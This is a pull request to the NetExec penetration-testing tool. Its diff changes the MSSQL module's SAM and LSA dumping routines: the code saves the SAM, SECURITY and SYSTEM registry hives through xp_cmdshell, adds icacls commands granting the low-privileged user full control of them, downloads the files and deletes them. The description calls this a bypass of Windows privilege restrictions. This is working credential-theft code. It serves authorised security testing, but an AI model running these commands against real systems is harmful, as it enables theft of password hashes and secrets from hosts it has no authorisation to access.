### PR TITLE
Add full control to dump files in order do bypass win restrictions

### DIFF
--- a/nxc/protocols/mssql.py
+++ b/nxc/protocols/mssql.py
@@ -554,10 +554,12 @@ class mssql(connection):
         system_storename = gen_random_string(6)
         dump_command = f"reg save HKLM\\SAM C:\\windows\\temp\\{sam_storename} && reg save HKLM\\SYSTEM C:\\windows\\temp\\{system_storename}"
         clean_command = f"del C:\\windows\\temp\\{sam_storename} && del C:\\windows\\temp\\{system_storename}"
+        get_owner_command = f"icacls C:\\windows\\temp\\{sam_storename} /grant {self.username}:F && icacls C:\\windows\\temp\\{system_storename} /grant {self.username}:F"
         output_filename = self.output_file_template.format(output_folder="sam")
         try:
             exec_method = MSSQLEXEC(self.conn, self.logger)
             exec_method.execute(dump_command)
+            exec_method.execute(get_owner_command)
             exec_method.get_file(f"C:\\windows\\temp\\{sam_storename}", f"{output_filename}.sam")
             exec_method.get_file(f"C:\\windows\\temp\\{system_storename}", f"{output_filename}.system")
             exec_method.execute(clean_command)
@@ -587,10 +589,12 @@ class mssql(connection):
         system_storename = gen_random_string(6)
         dump_command = f"reg save HKLM\\SECURITY C:\\windows\\temp\\{security_storename} && reg save HKLM\\SYSTEM C:\\windows\\temp\\{system_storename}"
         clean_command = f"del C:\\windows\\temp\\{security_storename} && del C:\\windows\\temp\\{system_storename}"
+        get_owner_command = f"icacls C:\\windows\\temp\\{security_storename} /grant {self.username}:F && icacls C:\\windows\\temp\\{system_storename} /grant {self.username}:F"
         output_filename = self.output_file_template.format(output_folder="lsa")
         try:
             exec_method = MSSQLEXEC(self.conn, self.logger)
             exec_method.execute(dump_command)
+            exec_method.execute(get_owner_command)
             exec_method.get_file(f"C:\\windows\\temp\\{security_storename}", f"{output_filename}.security")
             exec_method.get_file(f"C:\\windows\\temp\\{system_storename}", f"{output_filename}.system")
             exec_method.execute(clean_command)


### PR DESCRIPTION
## Description
If you are database owner, the database runs as nt authority\system, but you are not admin on the system, you can execute commands as system but not retrieve files that require local admin privs. This is due to MSSQL using the privileges of the user on the windows machine itself instead of the privileges that the MSSQL service has. Therefore, we can dump the SAM and LSA secrets (since we have command execution as local admin in service context), but not retrieve them (since this requires admin privs the user context does not have).

The solution is simple: grant our executing user FULL access to the files so we can read them with our low privileged user

TLDR; We bypass our windows low privileges by using the MSSQL service privileges (if running as system)

## Type of change
Insert an "x" inside the brackets for relevant items (do not delete options)

- [x] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] Deprecation of feature or functionality
- [ ] This change requires a documentation update
- [ ] This requires a third party update (such as Impacket, Dploot, lsassy, etc)
- [ ] This PR was created with the assistance of AI (list what type of assistance, tool(s)/model(s) in the description)

## Setup guide for the review
A few things to configure:
- MSSQL must run as NT AUTHORITY\SYSTEM
- The user must NOT be local administrator
- The user must by privileged in the MSSQL database (e.g. sysadmin)

Before:
The SAM dump will fail because we can save the registry hive to file (reg save), but can not read the SAM dump from disk since this would require admin privs for the user that we don't have.

After:
We use our admin privs via the MSSQL service (xp_cmdshell) to grant our user full access to the file -> SAM dump succeeds.

## Screenshots (if appropriate):
Before&After:
<img width="1302" height="354" alt="image" src="https://github.com/user-attachments/assets/e301ce4c-4fd4-4a46-afb5-ff2a7e7ef85e" />


## Checklist:
Insert an "x" inside the brackets for completed and relevant items (do not delete options)

- [ ] I have ran Ruff against my changes (poetry: `poetry run ruff check .`, use `--fix` to automatically fix what it can)
- [ ] I have added or updated the `tests/e2e_commands.txt` file if necessary (new modules or features are _required_ to be added to the e2e tests)
- [ ] If reliant on changes of third party dependencies, such as Impacket, dploot, lsassy, etc, I have linked the relevant PRs in those projects
- [ ] I have linked relevant sources that describes the added technique (blog posts, documentation, etc)
- [ ] I have performed a self-review of my own code (_not_ an AI review)
- [ ] I have commented my code, particularly in hard-to-understand areas
- [ ] I have made corresponding changes to the documentation (PR here: https://github.com/Pennyw0rth/NetExec-Wiki)
